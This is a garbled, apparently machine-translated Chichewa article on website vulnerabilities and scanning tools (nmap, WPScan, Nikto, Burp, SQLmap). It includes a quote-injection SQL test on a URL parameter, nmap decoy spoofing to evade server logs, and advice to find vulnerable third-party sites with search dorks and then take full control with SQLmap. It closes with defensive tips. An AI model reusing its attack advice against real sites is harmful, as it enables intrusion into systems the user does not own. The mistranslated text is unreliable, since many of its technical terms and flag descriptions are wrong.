Vulnerabilities malo. Website macheke. Program kuti aone malo vulnerabilities

webusaiti chitetezo nkhani sanayambe monga pachimake monga m'nthawi ya 21. Ndithudi, izi ndi chifukwa kufala mabuku a Internet mu pafupifupi onse mafakitale ndi minda. Tsiku lililonse, hackers ndi akatswiri chitetezo anapeza atsopano vulnerabilities malo. Ambiri a iwo ali pomwepo chatsekedwa eni kutukula, koma ena kukhala monga ali. Amene amagwiritsidwa ntchito ndi anthu a. Koma ntchito malo anadula zingachititse mavuto aakulu kwa owerenga ake onse ndi maseva lomwe linaikidwa.

Mitundu malo vulnerabilities

Pamene munakonza Intaneti ntchito ndi ambiri zipangizo zina zamakono amagetsi. Ena chipangizo ndi nthawi anayesedwa, ndipo ena atsopano ndipo simunayambe ankavala. Mulimonsemo, pali mitundu ya malo vulnerabilities:

• XSS. Aliyense malo ali ndi mawonekedwe yaing'ono. Iwo kuthandiza owerenga kulowa deta ndi kupeza chifukwa, kulembetsa ikuchitika kapena kutumiza mauthenga. M'MALO mu mawonekedwe a makhalidwe wapadera lingachititse kuphedwa kwa script, amene angachititse kuphwanya umphumphu wa malowo ndi deta kunyengerera.
• SQL-jekeseni. A njira sizachilendo komanso zothandiza kuti tidzalowe deta chinsinsi. Izi angayambe pogwiritsa keyala kapena kudzera mawonekedwe. Dongosololi ikuchitika ndi m'malo ndi mfundo zimene sangathe osasankhidwa zolembedwa ndi funso Nawonso achichepere. Ndipo ndi chizindikiritso choyenera zingayambitse kuswa chitetezo.

• HTML-zolakwa. Pafupifupi zofanana ndi za XSS, koma osati ophatikizidwa script code, ndi HTML.
• Kusatetezeka kwa malo kugwirizana ndi mayikidwe a owona ndi akalozera mu malo ofikira. Mwachitsanzo, podziwa kapangidwe ka masamba, mungathe kufika utsogoleli gulu code.
• chitetezo osakwanira a dongosolo la opaleshoni dongosolo pa makina. Ngati aliyense, kusatetezeka alipo, ndiye tizilomboto athe kudzapereka malamulo umasinthasintha.
• mapasiwedi zoipa. Mmodzi wa odziwika vulnerabilities malo - kugwiritsa ntchito mfundo ofooka kuteteza nkhani zawo. Makamaka ngati ndi mkulu.
• Gawo lotetezedwa zikusefukira. Izo zinali pamene m'malo deta pamtima, kotero kuti mungathe kusintha zawo. Kumachitika pamene nkhani ya mapulogalamu ungwiro.
• M'malo zigawo malo anu. Recreating ndi buku enieni webusaiti ndi mitengo kuti wosuta amene sangathe amaganiziridwa tsenga ndi lowetsani zambiri wanu, patapita nthawi kudutsa tizilomboto.
• Akana utumiki. Nthawi zambiri mawu amenewa amamvedwa kuukira makina pamene amalandira ambiri zopempha kuti sadziwa chochita, ndiponso kungoti "akutsikira" kapena sadzatha kutumikira anthu ameneŵa. Kusatetezeka kwagona kuti IP fyuluta si kukhazikitsidwa bwino.

Chiopsezo Jambulani Site

akatswiri Security anachita kafukufuku wapadera wa gwero intaneti zolakwa ndi zophophonya zimene zingachititse kuti akulimbana. Chotero malo yachinsinsi otchedwa pentesting. Dongosololi ri gwero kachidindo ntchito ndi CMS, pamaso pa zigawo tcheru ndi ena ambiri mayesero chidwi.

SQL-jekeseni

Mtundu wa mayeso malo Mzimuyo ngati script Zosefera mfundo analandira pokonza zopempha kuti Nawonso achichepere. Kuchititsa mayeso ophweka akhoza kukhala pamanja. Kodi kupeza SQL chiopsezo pa Intaneti? Amene ayankhidwa.

Mwachitsanzo, pali malo anga-sayt.rf. Pa tsamba kutsogolo ali m'ndandanda. Kupita mu icho, iwe angapezeke mu adiresi bala chinachake chonga kwanga sayt.rf /? Product_id = 1. Zikuoneka kuti ili ndi pempho kuti Nawonso achichepere. Kupeza malo vulnerabilities Choyamba kuyesera kulowetsamo mu mzere amagwira limodzi. Chifukwa, akhale anga sayt.rf /? Product_id = 1. Ngati inu tilimbikire "Lowani" batani pa tsamba, ndi uthenga zolakwa, kusatetezeka alipo.

Tsopano mukhoza ntchito zosiyanasiyana kusankha amatsogoza. Ntchito osakaniza ntchito kuchotserapo ndemanga ndi ena ambiri.

XSS

Mtundu wa chiopsezo mwina mitundu iwiri - udakali chabe.

Yogwira zikutanthauza kumayambiriro chidutswa cha m'buku Nawonso achichepere kapena file pa makina. Ndi zoopsa kwambiri ndi sizimadziwika.

mode chabe kumafuna kutikopa wozunzidwayo adilesi yeniyeni ya malo amene muli malamulo njiru.

Kugwiritsa XSS tizilomboto aziba Cookies. Ndipo iwo anyamula deta zofunika wosuta. Ngakhale zotsatira zina aakulu waba gawo.

Komanso tizilomboto tikhoza kugwiritsa ntchito script pa malo kuti apange nthawi kutumiza kunapatsa wosuta zambiri mwachindunji m'manja mwa tizilomboto ndi.

Pulogalamu ya ndondomeko kufufuza

maukonde mukhoza kupeza zambiri zosangalatsa chiopsezo Zitsulo zofufuzira zidazo malo. Ena amabwera okha, ena kubwera ndi angapo ofanana ndi ophatikizidwa mu chifanizo umodzi, ngati Kali Linux. Adzapitiriza kupereka kufotokoza zida otchuka kwambiri automate ndondomeko ya kutolera mfundo za vulnerabilities.

Nmap

Chophweka webusaiti chiopsezo sikana kuti akhoza kusonyeza zambiri monga madoko ndi ntchito opaleshoni dongosolo ntchito. Chitsanzo ntchito:

nmap -sS 127.0.0.1, kumene mmalo mwa adiresi m'dera IP m'pofunika mmalo weniweni mayeso malo.

Kutsiliza lipoti pa chimene misonkhano akuthamanga pa izo, ndi zimene madoko ndi lotsegula nthawi ino. Kuchokera pa zimenezi, mukhoza kugwiritsa ntchito waonetsedwa kale chiopsezo.

Nawa makiyi ochepa ku nmap jambulani kukondera:

• Ndiwo. Modzikhulupirira jambulani kuti mwazisiya zambiri, koma zingatenge nthawi yaitali.
• -O. Iwo akuyesera kudziwa opaleshoni dongosolo ntchito pa makina anu.
• -D. Spoof adiresi IP imene cheke zili kuti pamene inu kuona n'zosatheka Seva zipika kudziwa kumene kumuukira zinachitika.
• -p. Osiyanasiyana madoko. Afufuze ntchito zingapo lotseguka.
• -S. Iwo amalola kuti mwachindunji adilesi yoyenera IP.

WPScan

pulogalamuyi ndi kuti aone malo vulnerabilities m'gulu Kali Linux kugawa. Zokha kufufuza zinthu pa intaneti pa WordPress CMS. kwalembedwa Ruby, kotero kuthamanga ngati izi:

rube ./wpscan.rb --help. lamulo ili kukuwonetsani mungachite amapezeka ndi makalata.

lamulo akhoza ankayendetsa mayeso ophweka:

rube ./wpscan.rb --url some-sayt.ru

Ambiri WPScan - wokongola yosavuta kugwiritsa ntchito zofunikira kuti ayese malo anu pa "WordPress" vulnerabilities.

Nikto

Program malo afufuze kwa vulnerabilities, lomwe likupezeka mu Kali Linux kugawa. Imakhala mphamvu kwambiri kwa kuphweka zake zonse:

• Jambulani protocol ndi HTTP ndi HTTPS;
• anyalanyaza ambiri zipangizo anamanga-kudziwika;
• angapo doko kupanga sikani, ngakhale sanali muyezo osiyanasiyana;
• kuthandiza ntchito maseva tidzakulowereni;
• n'zotheka kukhazikitsa ndi kugwirizana pulagi-ins.

Kuyamba kusowa nikto dongosolo wakhala anaika perl. The kusanthula losavuta imagwiridwa motere:

perl nikto.pl -h 192.168.0.1.

pulogalamu akhoza "kudyetsedwa" wapamwamba lemba kuti akutionetsa adiresi Web Seva:

perl nikto.pl -h file.txt

chida ichi osati kuthandiza ogwira ntchito chitetezo kuchita Pentest, koma maukonde akuluakulu ndi chuma kukhalabe malo thanzi.

Burp Maapatimenti

A chida champhamvu kwambiri kufufuza osati malo, koma kuwunika zopezera aliyense. Ali ndi anamanga-mu ntchito ya pempho kusinthidwa zinachoka pa makina mayeso. Anzeru sikana amatha basi kuyang'ana kwa mitundu ingapo ya vulnerabilities mwakamodzi. N'zotheka kupulumutsa chifukwa cha ntchito panopa kenako n'kuyambiranso izo. Kusinthasintha osati ntchito lachitatu chipani pulagi-ins, komanso kulemba kwanu.

Zofunikira ali mwini mawonekedwe wosuta mawonekedwe ake, amene ndi mosakayikira yabwino, makamaka owerenga novice.

SQLmap

Mwina yabwino kwambiri ndi chida champhamvu yofunafuna SQL ndi XSS vulnerabilities. Lembani ubwino wake tingasonyezere monga:

• Support pafupifupi mitundu yonse ya machitidwe kasamalidwe Nawonso achichepere;
• luso logwiritsa ntchito njira zofunika zisanu kudziwa ntchito ndi SQL-jekeseni;
• Ogwiritsa busting mode, hashes awo, mapasiwedi ndi deta zina.

Musanagwiritse ntchito SQLmap zambiri choyamba anapeza malo osatetezeka kudzera ndi dork - akusowekapo injini kafufuzidwe kufufuza kukuthandizani kulimira pafupifupi zinthu zotiyenereza intaneti.

Ndiye adiresi ya tsamba anasamutsa pulogalamuyo, ndipo anayendera. Ngati bwino, kutanthauzira chiopsezo zofunikira akhoza wokha ndi ntchito kuti apeze mwayi wonse kuti gwero la.

Webslayer

A zofunikira zazing'ono kuti amalola kuti aukire chakuthengo mphamvu. Kodi "chakuthengo mphamvu" mitundu ya moyo, magawo chigawo malo. Iwo amathandiza Mipikisano threading, kumene kumakhudza ntchito kwambiri. Mukhoza kusankha masamba mapasiwedi recursively zinapeza malo okhala. Pali thandizo tidzakulowereni.

Resources kwambiri poona

Mugulu pali zida zambiri kuyesa kusatetezeka kwa malo online:

• coder-diary.ru. Zambiri malo Edzi. Monga kulowa adiresi, gwero ndi dinani "Chongani". Kufunafuna zingatenge nthawi yaitali, kotero inu mukhoza mwachindunji wanu email kuti kubwera kumapeto zotsatira za mwachindunji mu mayeso kabati. pali pafupifupi 2,500 kudziwika vulnerabilities mu malo.
• https://cryptoreport.websecurity.symantec.com/checker/. Online Service cheke kwa SSL ndi TLS kalata ku kampani Symantec. Pamafunika yekha adiresi, gwero la.
• https://find-xss.net/scanner/. ntchito ndi osiyana Php file mapanga sikani maulalo vulnerabilities kapena ZIP Archive. Mukhoza kukhazikitsa mitundu ya owona kuti scanned ndi zizindikiro, zimene lotetezeka ndi deta ku script lapansi.
• http://insafety.org/scanner.php. Sikana kuyesa malo pa nsanja "1C-Bitrix". Zambiri ndi mwachilengedwe mawonekedwe.

The aligorivimu kwa chindodo kwa vulnerabilities

Aliyense katswiri maukonde chitetezo amachita cheke pa aligorivimu losavuta:

1. Poyamba pamanja kapena pogwiritsa ntchito zida makina muone ngati pali chiopsezo chilichonse pa Intaneti. Ngati inde, ndiye Mzimuyo mtundu wawo.
2. Malingana ndi mtundu kusatetezeka pano amanga chimachititsanso zina. Mwachitsanzo, ngati ife tikudziwa CMS, ndiye kusankha njira yoyenera kuukira. Ngati ndi SQL-jekeseni, ndi mafunso anasankha Nawonso achichepere.
3. Cholinga chachikulu ndi kupeza mwayi mwayi kwa gulu utsogoleri. Ngati sikunali kotheka kuti tikwaniritse zimenezi, mwina ndi ofunika kuyesa kupanga adiresi yabodza ndi kumayambiriro script wake ndi kulanda wotsatira wa wovulalayo.
4. Ngati kuukira kapena malowedwe sichitha, izo akuyamba deta: palibe zambiri chiopsezo zomwe zopindika alipo.
5. Zochokera Katswiri deta chitetezo akuti malo mwini za mavuto ndi momwe kuti mulithetse.
6. Vulnerabilities kuletsedwa ndi manja ake kapena mothandizidwa ndi ambuye lachitatu chipani.

A ochepa chitetezo nsonga

Anthu amene kudzikonda akufotokozera webusaiti yake, kudzakuthandizani izi nsonga yosavuta ndi zidule.

deta ukubwera ayenera osasankhidwa kuti zolembedwa kapena mafunso sangathamange kuima-okha kapena kupereka deta ku Nawonso achichepere.

Muzigwiritsa ntchito manambala achinsinsi zovuta olimba kulumikiza utsogoleli gulu, pofuna kupewa zotheka chakuthengo mphamvu.

Ngati webusaiti zachokera kwa CMS, muyenera mwamsanga kutsimikiziridwa mapulagini, zidindo ndi zigawo akhoza kukhala pafupipafupi zosinthika ndi kuwagwiritsa. Musati zimamuchulukira malo ndi zigawo zosafunika.

Nthawi zambiri onani Seva zipika kwa liwuli aliyense Muzisamala kapena zochita.

Chongani malo anu Zitsulo zofufuzira zidazo ndi ntchito zingapo.

Zolondola Seva kasinthidwe - chinsinsi kugwira ntchito khola ndi wotetezeka.

Ngati n'kotheka, ntchito satifiketi SSL. Izi kuteteza kudutsana deta kapena chinsinsi pakati pa makina ndi wosuta.

Zida chitetezo. N'chinthu chanzeru kukhazikitsa kapena kulumikiza mapulogalamu kupewa kulowerera ndi kumuopseza kunja.

Pomaliza

Nkhani anatembenuka kusamutsidwa abwino, koma ngakhale sikokwanira kulongosola mwatsatanetsatane mbali zonse za maukonde chitetezo. Kuthana ndi vuto la chitetezo zambiri, m'pofunika kuphunzira kwambiri zipangizo ndi malangizo. Komanso kuphunzira gulu la zipangizo ndi njira zamakono. Mungathe kupempha malangizo ndiponso chithandizo kwa makampani akatswiri kuti amakhazikika mu Pentest ndi chuma kafukufuku intaneti. Ngakhale misonkhano imeneyi, ndipo isanduke kuchuluka wabwino, onse yemweyo malo chitetezo kungakhale zodula mawu zachuma ndi reputational.